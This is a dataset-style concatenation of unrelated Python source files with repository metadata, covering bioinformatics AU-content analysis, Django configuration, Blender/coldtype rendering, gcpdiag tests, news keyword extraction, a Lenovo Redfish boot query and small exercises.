def test_selfies_to_flat_hot(dataset, dataset_flat_hots):
entries, (vocab_stoi, vocab_itos, pad_to_len) = dataset
batch = [entry.selfies for entry in entries]
flat_hots = sf.batch_selfies_to_flat_hot(batch, vocab_stoi, pad_to_len)
assert flat_hots == dataset_flat_hots
# recover original selfies
recovered = sf.batch_flat_hot_to_selfies(flat_hots, vocab_itos)
assert batch == [s.replace("[nop]", "") for s in recovered]
| 29.887097
| 75
| 0.497572
|
93087e939536e17247d12458f25bfacc5cb78380
| 4,839
|
py
|
Python
|
scripts/module/analysis/target_site_composition.py
|
Naoto-Imamachi/MIRAGE
|
448d7f2b62f0830c0abd3eb1435d16baffc5d3f9
|
[
"MIT"
] | 3
|
2017-01-16T03:31:38.000Z
|
2021-01-04T16:00:59.000Z
|
scripts/module/analysis/target_site_composition.py
|
Imamachi-n/MIRAGE
|
448d7f2b62f0830c0abd3eb1435d16baffc5d3f9
|
[
"MIT"
] | null | null | null |
scripts/module/analysis/target_site_composition.py
|
Imamachi-n/MIRAGE
|
448d7f2b62f0830c0abd3eb1435d16baffc5d3f9
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
'''
target_site_composition.py:
Calculate target site composition (e.g. AU composition flanking the seed region)
-------- miRNA
||||||||
---------------- -------- ---------------- TargetRNA
upstream seed downstream
(30nt) (8nt) (30nt)
<AU content>
(1)seed region
(2)upstream region
(3)downstream region
    (4)the other 3'UTR region
    <AU content difference>
    (1)seed region - the other 3'UTR region
    (2)upstream region - the other 3'UTR region
    (3)downstream region - the other 3'UTR region
[1] Grimson A, Farh KK, Johnston WK, Garrett-Engele P, Lim LP, Bartel DP MicroRNA targeting specificity in mammals: determinants beyond seed pairing. Mol Cell. 2007 Jul 6;27(1):91-105.
'''
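# Illustrative sketch (hypothetical positions, not part of the original script):
# for a seed match spanning seq[st:ed], the regions above correspond to
#   seed       = seq[st:ed]                 # the 8 nt seed-match site
#   upstream   = seq[max(st - 30, 0):st]    # up to 30 nt 5' of the seed
#   downstream = seq[ed:ed + 30]            # up to 30 nt 3' of the seed
#   other_utr  = seq[:max(st - 30, 0)] + seq[ed + 30:]
# au_contents() below reports the A/U percentage of each slice, and the
# "difference" metrics subtract the other-3'UTR value from each regional value.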
def au_contents(args):
total = 0
au_number = 0
for x in args:
if x == 'A' or x == 'U':
au_number += 1
total += 1
if not total == 0:
au_content = int(au_number/total*100.0*10000)/10000
else:
au_content = 'NA'
return au_content, au_number
def calc_region_AU_content_ranking(args, cons_score, windows):
au_score_list = []
window_number = len(args)-windows
for x in range(window_number):
window_seq = args[x:x+windows]
au_content_window, au_number_window = au_contents(window_seq)
au_score_list.append(int(au_content_window*10000)/10000)
au_score_list.append(cons_score)
au_score_list.sort()
score_rank = au_score_list.index(cons_score)/window_number
return score_rank
def target_site_composition(targetrna_seq, tmp_dict, window_size=30):
seed_length = 8 #windows
window_length = window_size #windows
for x in list(tmp_dict.keys()):
id_infor = x
data = id_infor.split('||')
mirna_name_id = data[0]
targetrna_id = data[1]
targetrna_st = int(data[2]) - 1
targetrna_ed = int(data[3])
seed_up = targetrna_st - window_size
seed_down = targetrna_ed + window_size
#region infor
seed_match = targetrna_seq[targetrna_st:targetrna_ed]
if seed_up < 0:
seed_up = 0
seed_around_up = targetrna_seq[seed_up:targetrna_st] #upstream UTR
seed_around_down = targetrna_seq[targetrna_ed:seed_down] #downstream UTR
other_up = targetrna_seq[:seed_up]
other_down = targetrna_seq[seed_down:]
total_seq = other_up + other_down
#AU content in 3'UTR regions
au_content_utr, au_number_utr = au_contents(total_seq)
au_content_seed_around_up, au_number_seed_around_up = au_contents(seed_around_up)
au_content_seed_around_down, au_number_seed_around_down = au_contents(seed_around_down)
au_content_seed_match, au_number_seed_match = au_contents(seed_match)
#diff AU content(seed_around vs the other 3'UTR region)
if au_content_utr == 'NA':
diff_au_content_seed_around_up = 'NA'
diff_au_content_seed_around_down = 'NA'
diff_au_content_seed_match = 'NA'
else:
if not au_content_seed_around_up == 'NA':
diff_au_content_seed_around_up = au_content_seed_around_up - au_content_utr
else:
diff_au_content_seed_around_up = 'NA'
if not au_content_seed_around_down == 'NA':
diff_au_content_seed_around_down = au_content_seed_around_down - au_content_utr
else:
diff_au_content_seed_around_down = 'NA'
if not au_content_seed_match == 'NA':
diff_au_content_seed_match = au_content_seed_match - au_content_utr
else:
diff_au_content_seed_match = 'NA'
#calculate_AU-content_ranking_in_seed_region(or miRNA-TargetRNA hybrid region)
#print(x)
if not au_content_seed_around_up == 'NA':
AU_content_rank_upstream = calc_region_AU_content_ranking(targetrna_seq, au_content_seed_around_up, window_length)
else:
AU_content_rank_upstream = 'NA'
if not au_content_seed_around_down == 'NA':
AU_content_rank_downstream = calc_region_AU_content_ranking(targetrna_seq, au_content_seed_around_down, window_length)
else:
AU_content_rank_downstream = 'NA'
#result(3UTR_AU - seed_up_AU - seed_down_AU - seed_AU - diff_up_AU - diff_down_AU - diff_seed_AU)
tmp_dict[x].extend([au_content_utr, au_content_seed_around_up, au_content_seed_around_down, au_content_seed_match, diff_au_content_seed_around_up, diff_au_content_seed_around_down, diff_au_content_seed_match])
tmp_dict[x].extend([AU_content_rank_upstream, AU_content_rank_downstream])
return tmp_dict
| 41.715517
| 218
| 0.65902
|
6ba9fb808a4ebd5075f96b0aaaf86e1930c26ef2
| 387
|
py
|
Python
|
ghost/asgi.py
|
safia88/GhostPost
|
5e774ffbefcdb7b8a19f2a59b2ab4bfcf56b728c
|
[
"MIT"
] | null | null | null |
ghost/asgi.py
|
safia88/GhostPost
|
5e774ffbefcdb7b8a19f2a59b2ab4bfcf56b728c
|
[
"MIT"
] | null | null | null |
ghost/asgi.py
|
safia88/GhostPost
|
5e774ffbefcdb7b8a19f2a59b2ab4bfcf56b728c
|
[
"MIT"
] | null | null | null |
"""
ASGI config for ghost project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ghost.settings')
application = get_asgi_application()
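# A typical way to serve this application (an assumption, not part of the
# original file): point any ASGI server at the module-level callable, e.g.
#   uvicorn ghost.asgi:application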
| 22.764706
| 78
| 0.782946
|
03a6142f682e34614a93e0b15e5b0c743802b1c4
| 277
|
py
|
Python
|
PythonExercicios/ex107/teste.py
|
Lucas-ns/Python-3-Curso-Em-Video
|
f6d338fffd7a4606d34fab09634eea0fe4b3dfb3
|
[
"MIT"
] | null | null | null |
PythonExercicios/ex107/teste.py
|
Lucas-ns/Python-3-Curso-Em-Video
|
f6d338fffd7a4606d34fab09634eea0fe4b3dfb3
|
[
"MIT"
] | null | null | null |
PythonExercicios/ex107/teste.py
|
Lucas-ns/Python-3-Curso-Em-Video
|
f6d338fffd7a4606d34fab09634eea0fe4b3dfb3
|
[
"MIT"
] | null | null | null |
from ex107 import moeda
p = float(input('Digite o preço: R$'))
print(f'A metade de R${p} é R${moeda.metade(p)}')
print(f'O dobro de R${p} é R${moeda.dobro(p)}')
print(f'Aumentando 10%, temos R${moeda.aumentar(p, 10)}')
print(f'Reduzindo 13%, temos R${moeda.diminuir(p, 13)}')
| 34.625
| 57
| 0.66065
|
b4ca505f4a1703410cd6a9d76b8634be4ee3c006
| 1,004
|
py
|
Python
|
SLpackage/private/thirdparty/pythonpkgs/networkx/networkx_2.2/share/doc/networkx-2.2/examples/drawing/plot_weighted_graph.py
|
fanglab/6mASCOPE
|
3f1fdcb7693ff152f17623ce549526ec272698b1
|
[
"BSD-3-Clause"
] | 5
|
2022-02-20T07:10:02.000Z
|
2022-03-18T17:47:53.000Z
|
SLpackage/private/thirdparty/pythonpkgs/networkx/networkx_2.2/share/doc/networkx-2.2/examples/drawing/plot_weighted_graph.py
|
fanglab/6mASCOPE
|
3f1fdcb7693ff152f17623ce549526ec272698b1
|
[
"BSD-3-Clause"
] | null | null | null |
SLpackage/private/thirdparty/pythonpkgs/networkx/networkx_2.2/share/doc/networkx-2.2/examples/drawing/plot_weighted_graph.py
|
fanglab/6mASCOPE
|
3f1fdcb7693ff152f17623ce549526ec272698b1
|
[
"BSD-3-Clause"
] | null | null | null |
#! python
"""
==============
Weighted Graph
==============
An example using Graph as a weighted network.
"""
# Author: Aric Hagberg (hagberg@lanl.gov)
import matplotlib.pyplot as plt
import networkx as nx
G = nx.Graph()
G.add_edge('a', 'b', weight=0.6)
G.add_edge('a', 'c', weight=0.2)
G.add_edge('c', 'd', weight=0.1)
G.add_edge('c', 'e', weight=0.7)
G.add_edge('c', 'f', weight=0.9)
G.add_edge('a', 'd', weight=0.3)
elarge = [(u, v) for (u, v, d) in G.edges(data=True) if d['weight'] > 0.5]
esmall = [(u, v) for (u, v, d) in G.edges(data=True) if d['weight'] <= 0.5]
pos = nx.spring_layout(G) # positions for all nodes
# nodes
nx.draw_networkx_nodes(G, pos, node_size=700)
# edges
nx.draw_networkx_edges(G, pos, edgelist=elarge,
width=6)
nx.draw_networkx_edges(G, pos, edgelist=esmall,
width=6, alpha=0.5, edge_color='b', style='dashed')
# labels
nx.draw_networkx_labels(G, pos, font_size=20, font_family='sans-serif')
plt.axis('off')
plt.show()
| 24.487805
| 75
| 0.618526
|
80c74151ecb20f7f6e0f1b242f0304370e857b4e
| 6,021
|
py
|
Python
|
coldtype/blender/__init__.py
|
ruohoruotsi/coldtype
|
13993e5a4fa3f99c6800fed2496bd5a374e4f53f
|
[
"Apache-2.0"
] | null | null | null |
coldtype/blender/__init__.py
|
ruohoruotsi/coldtype
|
13993e5a4fa3f99c6800fed2496bd5a374e4f53f
|
[
"Apache-2.0"
] | null | null | null |
coldtype/blender/__init__.py
|
ruohoruotsi/coldtype
|
13993e5a4fa3f99c6800fed2496bd5a374e4f53f
|
[
"Apache-2.0"
] | null | null | null |
# to be loaded from within Blender
import os, math
from coldtype.geometry.rect import Rect
from coldtype.pens.datpen import DATPen, DATPens
from coldtype.pens.blenderpen import BlenderPen, BPH
from coldtype.time import Frame, Timeline
from coldtype.renderable import renderable
from coldtype.renderable.animation import animation
from coldtype.blender.render import blend_source
try:
import bpy
except ImportError:
    bpy = None
def b3d(collection, callback=None, plane=False, dn=False):
pen_mod = None
if callback and not callable(callback):
pen_mod = callback[0]
callback = callback[1]
def _cast(pen:DATPen):
if bpy and pen_mod:
pen_mod(pen)
        pen.add_data("b3d", dict(
            collection=collection,
            plane=plane,
            callback=callback))
return _cast
def b3d_mod(callback):
def _cast(pen:DATPen):
if bpy:
callback(pen)
return _cast
class b3d_mods():
@staticmethod
def center(r:Rect):
return b3d_mod(lambda p:
p.translate(-r.w/2, -r.h/2))
def centerx(r:Rect):
return b3d_mod(lambda p:
p.translate(-r.w/2, 0))
def centery(r:Rect):
return b3d_mod(lambda p:
p.translate(0, -r.h/2))
def walk_to_b3d(result:DATPens, dn=False):
def walker(p:DATPen, pos, data):
if pos == 0:
bdata = p.data.get("b3d")
if bdata:
coll = BPH.Collection(bdata["collection"])
if bdata.get("plane"):
bp = p.cast(BlenderPen).draw(coll, plane=True)
else:
bp = p.cast(BlenderPen).draw(coll, dn=dn)
if bdata.get("callback"):
bdata.get("callback")(bp)
bp.hide(not p._visible)
result.walk(walker)
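# Rough usage sketch (hypothetical pen construction; "Text" is just an example
# collection name): b3d() returns a casting function that stores the target
# Blender collection and an optional per-BlenderPen callback in the pen's data,
# and walk_to_b3d() later reads that data and draws each tagged pen into the
# named collection, e.g.
#   pens = DATPens([DATPen(rect).tag("Glyph0").chain(b3d("Text"))])
#   walk_to_b3d(pens)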
class b3d_renderable(renderable):
pass
class b3d_animation(animation):
def __init__(self, rect=(1080, 1080), **kwargs):
self.func = None
self.name = None
self.current_frame = -1
super().__init__(rect=rect, **kwargs)
if bpy:
bpy.data.scenes[0].frame_end = self.t.duration-1
# don't think this is totally accurate but good enough for now
if isinstance(self.t.fps, float):
bpy.data.scenes[0].render.fps = round(self.t.fps)
bpy.data.scenes[0].render.fps_base = 1.001
else:
bpy.data.scenes[0].render.fps = self.t.fps
bpy.data.scenes[0].render.fps_base = 1
def post_read(self):
super().post_read()
if bpy:
bpy.data.scenes[0].render.filepath = str(self.blender_output_dir()) + "/"
def blender_output_dir(self):
output_dir = self.output_folder / "_blender"
output_dir.mkdir(parents=True, exist_ok=True)
return output_dir
def blender_render(self, file, blend_file, artifacts, samples=4):
output_dir = self.blender_output_dir()
for a in artifacts[:]:
if a.render == self:
blend_source(
file,
blend_file,
a.i,
output_dir,
samples=samples)
os.system("afplay /System/Library/Sounds/Pop.aiff")
def blender_render_frame(self, file, blend_file, fi, samples=4):
blend_source(file, blend_file, fi, self.blender_output_dir(), samples)
def blender_rendered_preview(self):
if bpy: return
from coldtype.img.skiaimage import SkiaImage
@animation(self.rect, timeline=self.timeline, preview_only=1, sort=1000)
def blender_preview(f):
try:
out = self.blender_output_dir()
return SkiaImage(out / "{:04d}.png".format(f.i))
except:
pass
return blender_preview
if __name__ == "<run_path>":
from coldtype.text.composer import StSt, Font
from coldtype.color import hsl
fnt = Font.Cacheable("~/Type/fonts/fonts/PappardelleParty-VF.ttf")
@b3d_renderable()
def draw_bg(r):
return DATPens([
(DATPen(r.inset(0, 0)).f(hsl(0.85, 1, 0.7))
.tag("BG2")
.chain(b3d("Text", plane=1)))])
@b3d_animation(timeline=Timeline(60, 30), bg=0, layer=1, rstate=1)
def draw_dps(f, rs):
if bpy:
bpy.data.objects['Light'].rotation_euler[2] = f.e("l", rng=(0, math.radians(360)), to1=0)
centroid = BPH.AddOrFind("Centroid",
lambda: bpy.ops.object.empty_add(type="PLAIN_AXES"))
centroid.location = (5.4, 5.4, 0)
centroid.rotation_euler[2] = f.e("l", rng=(0, math.radians(360)), to1=0)
if False: # if you want to render in a multi-plexed fashion
if not bpy and not rs.previewing:
draw_dps.blender_render_frame("scratch.blend", f.i)
txt = (StSt("ABCDEFG", fnt, 330, palette=0)
.align(f.a.r)
.collapse()
.map(lambda i, p: p.explode())
.collapse()
.pmap(lambda i,p: p
.declare(fa:=f.adj(-i*1))
.cond(p.ambit().y > 570, lambda pp:
pp.translate(0, fa.e("seio", 2, rng=(50, 0))))
.cond(p.ambit().mxy < 490, lambda pp:
pp.translate(0, fa.e("seio", 2, rng=(-50, 0))))
.tag(f"Hello{i}")
.chain(b3d_mods.center(f.a.r))
.chain(b3d("Text", lambda bp: bp
.extrude(fa.e("eeio", 1, rng=(0.25, 2)))
.metallic(1)))))
return DATPens([txt])
previewer = draw_dps.blender_rendered_preview()
#def build(artifacts):
# draw_dps.blender_render("scratch.blend", artifacts[:1], samples=8)
#def release(artifacts):
# draw_dps.blender_render("scratch.blend", artifacts, samples=8)
| 31.52356
| 101
| 0.555057
|
8e13297e4ab1e532d2d8d742e702fdd96cd24e72
| 930
|
py
|
Python
|
push_main-pushplus.py
|
Weidows/AutoMihoyoBBS
|
62df3ffe306b6be742f75050d854293f4ac10483
|
[
"MIT"
] | 338
|
2021-05-23T14:06:29.000Z
|
2022-03-31T13:46:44.000Z
|
push_main-pushplus.py
|
Weidows/AutoMihoyoBBS
|
62df3ffe306b6be742f75050d854293f4ac10483
|
[
"MIT"
] | 59
|
2021-06-08T10:29:14.000Z
|
2022-03-30T12:19:11.000Z
|
push_main-pushplus.py
|
Weidows/AutoMihoyoBBS
|
62df3ffe306b6be742f75050d854293f4ac10483
|
[
"MIT"
] | 129
|
2021-06-19T10:42:36.000Z
|
2022-03-31T12:58:48.000Z
|
import sys
import time
import random
import subprocess
from request import http
SendKey = ""
send_Url = "http://www.pushplus.plus/send"
python_Path = sys.executable
run_ShellCommand = python_Path + " main_multi.py autorun"
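# Run main_multi.py up to two times, sleeping a random 30-70 seconds after a
# failed attempt, then report the outcome through the pushplus API below.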
for i in range(2):
opt_id, opt_info = subprocess.getstatusoutput(run_ShellCommand)
if opt_id == 0:
break
time.sleep(random.randint(30, 70))
if opt_id != 0:
print("Error!")
http.post(
url=send_Url,
data={
"token": SendKey,
"title": "「米游社-签到」Error!",
"content": opt_info.split()[-1] + "\nHello!推送相关的设置已修改,请注意更新!\n这里是运行相关日志:\r\n" + opt_info,
}
)
else:
print("OK!")
http.post(
url=send_Url,
data={
"token": SendKey,
"title": "「米游社-签到」OK!",
"content": opt_info.split()[-1] + "\nHello!推送相关的设置已修改,请注意更新!\n这里是运行相关日志:\r\n" + opt_info,
}
)
exit(0)
| 22.682927
| 101
| 0.57957
|
011d82da4840fcb2683d0d0b66de7d1df52bc644
| 3,224
|
py
|
Python
|
gcpdiag/lint/command_test.py
|
eyalzek/gcpdiag
|
0378898dc407271741de33fb56f59aebf905292b
|
[
"Apache-2.0"
] | null | null | null |
gcpdiag/lint/command_test.py
|
eyalzek/gcpdiag
|
0378898dc407271741de33fb56f59aebf905292b
|
[
"Apache-2.0"
] | null | null | null |
gcpdiag/lint/command_test.py
|
eyalzek/gcpdiag
|
0378898dc407271741de33fb56f59aebf905292b
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test code in command.py."""
from gcpdiag import lint
from gcpdiag.lint import command
class Test:
"""Unit tests for command."""
# pylint: disable=protected-access
def test_flatten_multi_arg(self):
assert list(command._flatten_multi_arg([])) == []
assert list(command._flatten_multi_arg(['*BP*'])) == ['*BP*']
assert list(command._flatten_multi_arg(['*BP*',
'*ERR*'])) == ['*BP*', '*ERR*']
assert list(command._flatten_multi_arg(['*BP*,*ERR*'])) == ['*BP*', '*ERR*']
assert list(command._flatten_multi_arg(['*BP*, *ERR*'
])) == ['*BP*', '*ERR*']
# pylint: disable=protected-access
def test_init_args_parser(self):
parser = command._init_args_parser()
args = parser.parse_args(['--project', 'myproject'])
assert args.project == 'myproject'
assert args.billing_project is None
assert args.auth_adc is False
assert args.auth_key is None
assert args.auth_oauth is False
assert args.verbose == 0
assert args.within_days == 3
assert args.include is None
assert args.exclude is None
assert args.include_extended is False
assert args.config is None
assert args.show_skipped is False
assert args.hide_ok is False
assert args.logging_ratelimit_requests is None
assert args.logging_ratelimit_period_seconds is None
assert args.logging_page_size is None
assert args.logging_fetch_max_entries is None
assert args.logging_fetch_max_time_seconds is None
# pylint: disable=protected-access
def test_provided_init_args_parser(self):
parser = command._init_args_parser()
args = parser.parse_args(['--project', 'myproject', '--include', '*ERR*'])
assert args.include == ['*ERR*']
args = parser.parse_args(['--project', 'myproject', '--exclude', '*BP*'])
assert args.exclude == ['*BP*']
args = parser.parse_args(['--project', 'myproject', '--include-extended'])
assert args.include_extended is True
args = parser.parse_args(
['--project', 'myproject', '--config', '/path/to/file'])
assert args.config == '/path/to/file'
# pylint: disable=protected-access
def test_load_repository_rules(self):
repo = lint.LintRuleRepository()
command._load_repository_rules(repo)
modules = {r.product for r in repo.rules}
assert 'gke' in modules
assert 'gcb' in modules
assert 'gaes' in modules
assert 'gce' in modules
assert 'iam' in modules
assert 'apigee' in modules
assert 'composer' in modules
assert 'dataproc' in modules
assert 'gcs' in modules
assert 'gcf' in modules
| 38.380952
| 80
| 0.67897
|
2a679c9754dc54e38dee6cf3f3e0c47c1ae0b64c
| 567
|
py
|
Python
|
archivable_model/tests/models.py
|
martinfaucheux/django-archving
|
9b1cc056c2f6e92fa42e31079a5f87037deef4e0
|
[
"MIT"
] | 1
|
2022-01-19T19:03:53.000Z
|
2022-01-19T19:03:53.000Z
|
archivable_model/tests/models.py
|
martinfaucheux/django-archiving
|
9b1cc056c2f6e92fa42e31079a5f87037deef4e0
|
[
"MIT"
] | null | null | null |
archivable_model/tests/models.py
|
martinfaucheux/django-archiving
|
9b1cc056c2f6e92fa42e31079a5f87037deef4e0
|
[
"MIT"
] | null | null | null |
from archivable_model.models import ArchivableModel
from django.db import models
class Author(ArchivableModel):
name = models.CharField(max_length=100, blank=True)
def __str__(self):
return self.name
class Category(ArchivableModel):
name = models.CharField(max_length=100, blank=True)
def __str__(self):
return self.name
class Article(ArchivableModel):
author = models.ForeignKey(Author, on_delete=models.CASCADE)
category = models.ForeignKey(
Category, on_delete=models.CASCADE, null=True, default=None
)
| 22.68
| 67
| 0.728395
|
d620390fa83d9db3fdf5653864b67b076993bb9b
| 4,964
|
py
|
Python
|
UHACK/summaryKeywords.py
|
rajatrawataku1/Thiknpad
|
ae62efde9520c54ab8d2dd9164815609c1abf67c
|
[
"MIT"
] | null | null | null |
UHACK/summaryKeywords.py
|
rajatrawataku1/Thiknpad
|
ae62efde9520c54ab8d2dd9164815609c1abf67c
|
[
"MIT"
] | null | null | null |
UHACK/summaryKeywords.py
|
rajatrawataku1/Thiknpad
|
ae62efde9520c54ab8d2dd9164815609c1abf67c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: iso-8859-15 -*-
# from __future__ import absolute_import
# from __future__ import division, unicode_literals
import newspaper
from newspaper import Article
from nltk import word_tokenize, pos_tag, ne_chunk
import unicodedata
from summy import lets_summarize
from nltk.chunk import conlltags2tree, tree2conlltags
from nltk.sentiment.vader import SentimentIntensityAnalyzer
#import googleImages
import re
# from sumy.parsers.html import HtmlParser
# from sumy.parsers.plaintext import PlaintextParser
# from sumy.nlp.tokenizers import Tokenizer
# from sumy.summarizers.lsa import LsaSummarizer as Summarizer
# from sumy.nlp.stemmers import Stemmer
# from sumy.utils import get_stop_words
# LANGUAGE = "english"
# SENTENCES_COUNT = 5
#
#
# def lets_summarize(url):
# parser = HtmlParser.from_url(url, Tokenizer(LANGUAGE))
# # or for plain text files
# # parser = PlaintextParser.from_file("document.txt", Tokenizer(LANGUAGE))
# stemmer = Stemmer(LANGUAGE)
# summary = []
# summarizer = Summarizer(stemmer)
# summarizer.stop_words = get_stop_words(LANGUAGE)
#
# for sentence in summarizer(parser.document, SENTENCES_COUNT):
# summary.append(sentence)
# return summary
def get_senti(text):
sid = SentimentIntensityAnalyzer()
ss = sid.polarity_scores(text)
return ss
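# Rough shape of what get_senti() returns (the numbers are illustrative only):
# SentimentIntensityAnalyzer.polarity_scores() yields a dict of the form
#   {'neg': 0.0, 'neu': 0.6, 'pos': 0.4, 'compound': 0.7}
# and extract_keywords() below maps the 'compound' score to Positive/Negative/
# Neutral using +0.4 / -0.4 thresholds.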
def entity(article, keys):
    sentence = article
    def remove_non_ascii(text):
        return ''.join([i if ord(i) < 128 else ' ' for i in text])
    buzzwords = []
    buzzwords_type = []
sen = remove_non_ascii(sentence)
chunks = ne_chunk(pos_tag(word_tokenize(sen)))
iob_tagged = tree2conlltags(chunks)
size = len(iob_tagged)
k = 0
for i in range(0,size):
if iob_tagged[i][2] != 'O':
sums = unicodedata.normalize('NFKD', iob_tagged[i][0]).encode('ascii','ignore')
sums = sums.lower()
buzzwords.append(sums)
sums = unicodedata.normalize('NFKD', iob_tagged[i][2]).encode('ascii','ignore')
sums = sums.lower()
words = sums.split('-')
buzzwords_type.append(words[1])
k += 1
return buzzwords,buzzwords_type
def extract_keywords(article,url1):
article.download()
article.parse()
article.nlp()
summary = article.summary
if summary == '':
summary = lets_summarize(url1)
#summar = []
#summary = unicodedata.normalize('NFKD', summary).encode('ascii','ignore')
#summary = ''.join([i if ord(i) < 128 else ' ' for i in summary])
size = len(summary)
summary = str(summary)
#print type(summary)
#words = word_tokenize(str(summary))
words = summary.split(' ')
#print words
to_remove = ['[<Sentence:',"{u'article':",'\n','<Sentence:']
summary = []
for wor in words:
if wor not in to_remove:
summary.append(wor)
summary = ' '.join(summary)
#words = summary.split('\n')
summary = re.sub('[^a-zA-Z0-9 \n/\.]', '', summary)
#print words
#print summary
    keys = []
    # iterate over the extracted keywords themselves; `size` above measures the
    # summary text, not the keyword list
    for keyword in article.keywords:
        sums = unicodedata.normalize('NFKD', keyword).encode('ascii', 'ignore')
        keys.append(sums)
used = []
buzzwords,buzzwords_type = entity(article.text,keys)
i = 0
gpe = []
people = []
organization = []
random = []
for best in buzzwords:
if best in keys:
if best in used:
continue
used.append(best)
if buzzwords_type[i]== 'gpe' or buzzwords_type[i]== 'geo':
gpe.append(best)
elif buzzwords_type[i] == 'person' or buzzwords_type[i]=='per':
people.append(best)
elif buzzwords_type[i] == 'organization'or buzzwords_type[i]=='org':
organization.append(best)
else :
random.append(best)
i += 1
sentiment = get_senti(article.text)
if sentiment['compound'] > 0.4 :
sent = 'Positive'
elif sentiment['compound'] < -0.4:
sent = 'Negative'
else:
sent = 'Neutral'
#links = googleImages.googleImg(keys);
output = {
'summary': summary,
'people':people,
'place':gpe,
'organization':organization,
'random':random,
'sentiment_prob':sentiment,
'all_keywords':keys,
'sentiment': sent,
#'images':links
}
#print type(output)
#print output['summary']
return output
def runFinal(url1 = "http://localhost:8082"):
article = Article(url = url1)
output = extract_keywords(article,url1)
return output
| 31.417722
| 94
| 0.591056
|
0a7de2a74606abf1a9046300ef1883c3da710358
| 4,022
|
py
|
Python
|
examples/get_server_boot_once.py
|
lenovo/lenovo-python-redfish
|
a2d2608aa33ee5087b62bf46695394571a1aaad9
|
[
"Apache-2.0"
] | null | null | null |
examples/get_server_boot_once.py
|
lenovo/lenovo-python-redfish
|
a2d2608aa33ee5087b62bf46695394571a1aaad9
|
[
"Apache-2.0"
] | null | null | null |
examples/get_server_boot_once.py
|
lenovo/lenovo-python-redfish
|
a2d2608aa33ee5087b62bf46695394571a1aaad9
|
[
"Apache-2.0"
] | null | null | null |
###
#
# Lenovo Redfish examples - Get the current System Boot Once target
#
# Copyright Notice:
#
# Copyright 2018 Lenovo Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
###
import sys
import json
import redfish
from redfish import redfish_logger
import traceback
import lenovo_utils as utils
def get_server_boot_once(ip, login_account, login_password, system_id):
"""Get server boot once item
:params ip: BMC IP address
:type ip: string
:params login_account: BMC user name
:type login_account: string
:params login_password: BMC user password
:type login_password: string
    :params system_id: ComputerSystem instance id (None: first instance, All: all instances)
:type system_id: None or string
:returns: returns server boot once item when succeeded or error message when failed
"""
result = {}
login_host = "https://" + ip
try:
# Connect using the BMC address, account name, and password
# Create a REDFISH object
REDFISH_OBJ = redfish.redfish_client(base_url=login_host, username=login_account, timeout=utils.g_timeout,
password=login_password, default_prefix='/redfish/v1', cafile=utils.g_CAFILE)
# Login into the server and create a session
REDFISH_OBJ.login(auth=utils.g_AUTH)
except:
traceback.print_exc()
result = {'ret': False, 'msg': "Please check the username, password, IP is correct"}
return result
# GET the ComputerSystem resource
boot_details = []
system = utils.get_system_url("/redfish/v1", system_id, REDFISH_OBJ)
if not system:
result = {'ret': False, 'msg': "This system id is not exist or system member is None"}
REDFISH_OBJ.logout()
return result
for i in range(len(system)):
system_url = system[i]
response_system_url = REDFISH_OBJ.get(system_url, None)
if response_system_url.status == 200:
# Get the response
boot_server = {}
properties = ['BootSourceOverrideEnabled', 'BootSourceOverrideMode', 'BootSourceOverrideTarget']
for property in properties:
if property in response_system_url.dict["Boot"]:
boot_server[property] = response_system_url.dict["Boot"][property]
boot_details.append(boot_server)
else:
result = {'ret': False, 'msg': "response_system_url Error code %s" % response_system_url.status}
REDFISH_OBJ.logout()
return result
result['ret'] = True
result['entries'] = boot_details
# Logout of the current session
try:
REDFISH_OBJ.logout()
except:
pass
return result
if __name__ == '__main__':
# Get parameters from config.ini and/or command line
argget = utils.create_common_parameter_list()
args = argget.parse_args()
parameter_info = utils.parse_parameter(args)
# Get connection info from the parameters user specified
ip = parameter_info['ip']
login_account = parameter_info["user"]
login_password = parameter_info["passwd"]
system_id = parameter_info['sysid']
# Get server boot once item and check result
result = get_server_boot_once(ip, login_account, login_password, system_id)
if result['ret'] is True:
del result['ret']
sys.stdout.write(json.dumps(result['entries'], sort_keys=True, indent=2))
else:
sys.stderr.write(result['msg'])
sys.exit(1)
| 36.563636
| 122
| 0.676032
|
c45099f96c09dc8c07e63762efabe5630df491b7
| 652
|
py
|
Python
|
ch01/creativity/c_1_14.py
|
walshification/dsap
|
85c62ec663fda13283fc0a2ab5c567387cadac02
|
[
"MIT"
] | null | null | null |
ch01/creativity/c_1_14.py
|
walshification/dsap
|
85c62ec663fda13283fc0a2ab5c567387cadac02
|
[
"MIT"
] | null | null | null |
ch01/creativity/c_1_14.py
|
walshification/dsap
|
85c62ec663fda13283fc0a2ab5c567387cadac02
|
[
"MIT"
] | null | null | null |
"""
Write a short Python function that takes a sequence of integer values
and determines if there is a distinct pair of numbers in the sequence
whose product is odd.
"""
from typing import List
def has_odd_product_pair(data: List[int]) -> bool:
"""Returns True if data contains a distinct pair of numbers whose
product is odd.
"""
data_length = len(data)
# End at data_length - 1 because the last index gets checked by all the others.
for k in range(data_length - 1):
for j in range(k + 1, data_length):
if (data[k] * data[j]) % 2 == 1 and data[k] != data[j]:
return True
return False
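# A few illustrative cases (not part of the original exercise file):
#   has_odd_product_pair([2, 4, 6]) -> False   # no odd values at all
#   has_odd_product_pair([3, 3])    -> False   # odd product, but not a distinct pair
#   has_odd_product_pair([3, 5, 6]) -> True    # 3 * 5 = 15 is odd
# Equivalently, the result is True exactly when the sequence contains two
# distinct odd values.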
| 31.047619
| 83
| 0.656442
|
